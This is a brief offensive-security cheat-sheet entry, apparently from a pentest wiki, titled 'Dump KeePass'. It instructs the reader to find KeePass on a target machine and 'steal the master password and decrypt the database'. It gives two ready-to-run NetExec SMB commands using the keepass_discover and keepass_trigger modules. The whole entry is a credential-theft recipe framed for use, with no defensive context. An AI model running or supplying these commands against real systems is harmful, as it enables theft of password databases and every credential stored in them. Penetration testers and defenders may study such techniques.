Dump KeePass

You can check if keepass is installed on the target computer and then steal the master password and decrypt the database !

$ NetExec smb <ip> -u user -p pass -M keepass_discover
$ NetExec smb <ip> -u user -p pass -M keepass_trigger -o KEEPASS_CONFIG_PATH="path_from_module_discovery"

Last updated